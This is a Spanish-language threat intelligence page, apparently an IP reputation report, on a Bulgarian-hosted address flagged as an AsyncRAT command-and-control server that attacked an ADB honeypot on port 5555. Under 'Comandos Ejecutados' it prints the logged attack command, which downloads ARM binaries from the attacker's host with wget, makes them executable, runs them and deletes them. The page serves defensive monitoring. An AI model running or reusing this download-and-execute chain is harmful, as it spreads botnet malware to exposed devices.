TROYANOSYVIRUS
Amenaza ActivaBAJO

192.109.200.197

Pais de Origen🇧🇬 BG
Primera Deteccion20/4/2026
Ultima Actividad20/4/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
6
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇧🇬 BG
Ciudad
Desconocida
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Tipos de Ataque

adb_honeypot

Puertos Atacados

5555

Malware Asociado

Sin malware asociado

Comandos Ejecutados

$cd /data/local/tmp/; busybox wget http://192.109.200.197/armv5l; chmod +x armv5l; ./armv5l; wget http://192.109.200.197/armv6l; chmod +x armv6l; ./armv6l; wget http://192.109.200.197/armv7l; chmod +x armv7l; ./armv7l; rm -rf arm*2x

ThreatFox Intelabuse.ch

⚠️SERVIDOR C2 CONOCIDO
Familias de Malware
win.asyncrat
Tipos de Amenaza
botnet_cc
Confianza: 100%

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
445338959855986
Hostnames
longingtank.ptr.network

Evaluacion de Riesgo

10
/100
BajoMedioAltoCritico